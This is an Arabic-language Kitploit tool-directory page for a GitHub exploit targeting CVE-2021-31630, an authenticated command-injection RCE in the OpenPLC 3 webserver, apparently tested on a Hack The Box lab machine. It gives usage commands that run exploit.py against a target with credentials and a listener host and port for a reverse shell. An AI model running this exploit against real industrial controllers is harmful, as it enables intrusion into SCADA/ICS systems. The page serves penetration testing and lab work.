Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-31630 — OpenPLC 3: تنفيذ تعليمات برمجية عن بُعد بعد المصادقة على خادم الويب. | Kitploit
أدوات/GitHubGitHub/manuelsantosiglesias/cve-2021-31630
تحليل الثغرات الأمنيةالاستغلالأمن SCADA/ICSاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubmanuelsantosiglesias/cve-2021-31630

CVE-2021-31630

OpenPLC 3: تنفيذ تعليمات برمجية عن بُعد بعد المصادقة على خادم الويب.

عرض المستودع
5منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-31630

OpenPLC 3 WebServer تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة.

الوصف

يؤدي وجود ثغرة حقن الأوامر في Open PLC Webserver الإصدار v3 إلى تمكين المهاجمين عن بُعد من تشغيل تعليمات برمجية عشوائية. تم اختبارها فقط على آلة HTB Wifinetictwo.htb.

واجهت مشاكل مع جميع السكربتات التي تستغل الثغرة، ربما لأنني أستخدم Parrot أو متصفحي، متصفح Chromium يعمل لتسجيل الدخول، بينما واجهت مشاكل في تسجيل الدخول مع Firefox ويحدث شيء غريب لخادم الويب مع طلب POST لتسجيل الدخول. قمت بتعديل السكربت من thewhiteh4t؛ هناك أجزاء (بشكل أساسي طريقة الرفع) منسوخة فقط، لكنني غيّرت الجزء الذي يحصل على الكوكيز من الخادم لتشغيل الاستغلال.

تم توفير الإثبات الأصلي (PoC) بواسطة Fellipe Oliveira

آمل أن يساعدك إذا واجهت مشاكل معه.

التبعيات

root@kitploit:~
pip3 install requests

الاستخدام

root@kitploit:~
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx

بدلاً من ذلك، يمكنك تعديل exploit.py

root@kitploit:~
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...

python3 exploit.py http://10.129.x.x:8080 user pass
تنزيل الأداة